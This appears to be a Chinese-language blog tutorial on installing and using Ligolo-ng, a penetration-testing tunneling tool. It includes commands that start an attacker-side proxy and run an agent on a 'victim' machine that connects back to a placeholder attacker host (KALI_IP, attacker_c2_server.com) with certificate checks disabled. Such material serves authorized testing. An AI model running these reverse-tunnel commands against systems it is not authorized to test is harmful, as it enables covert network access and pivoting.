隧道代理工具 - Ligolo-ng

发布于: 2026-07-17 03:23

介绍

Ligolo-ng是一款简单、轻量级且快速的工具,它允许渗透测试人员使用tun 接口从反向 TCP/TLS 连接建立隧道(无需 SOCKS)

项目地址:https://github.com/nicocha30/ligolo-ng

官网文档:https://docs.ligolo.ng/

优势

  • 使用简单
  • 隧道接口(不再使用 SOCKS!)
  • 支持多种平台(Linux、Windows、macOS)
  • 高性能
  • 不需要高权限
  • 使用 Let's Encrypt 自动配置证书

攻击机(kali)需要有权限创建tun网卡接口,对于靶机来说,ligolo-ng不需要高权限即可运行

安装

预编译二进制文件

Github Releasehttps://github.com/nicocha30/ligolo-ng/releases获取最新预编译版本二进制文件(Windows/Linux/macOS/BSD)

kali存储库

Ligolo-ng 现在已默认包含在 Kali Linux 中,使用以下命令安装它:

apt install ligolo-ng

快速入门

帮助信息

# -laddr <addr> 监听地址,默认 0.0.0.0:11601
# -selfcert 生成自签名证书
# -certfile <cert> 指定证书文件
# -keyfile <key> 指定密钥文件
# -autocert 使用 Let's Encrypt 自动配置证书
# -config <file> 指定配置文件
./proxy [-laddr <addr>]  [-selfcert] [-certfile <cert> -keyfile <key>] [-autocert] [-config <file>] [-v] [-daemon]

攻击机创建tun接口

sudo ip tuntap add mode tun ligolo
sudo ip link set ligolo up

攻击机(kali)启动 Ligolo-ng 代理服务器(默认端口 11601):

./proxy -h
# 使用自签名证书
./proxy -selfcert 
# 忽略证书验证
./proxy -ignore-cert
# 使用 Let's Encrypt 自动配置证书
./proxy -autocert

在目标(受害者)计算机上启动代理(无需任何权限):

# linux
./agent -connect KALI_IP:11601 -ignore-cert
:: windows
.\agent.exe -connect KALI_IP:11601 -ignore-cert

目标机器启动代理后,攻击机会提示收到一个会话

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
  • session 显示当前会话列表
  • start 启动隧道

TLS选项

  • -autocert:代理会在代理连接时自动为attacker_c2_server.com请求证书(使用 Let's Encrypt)
  • certfile/keyfile:使用自定义证书和密钥文件
  • selfcert:自动生成并使用自签名证书
  • ignore-cert:忽略证书验证,不考虑安全机制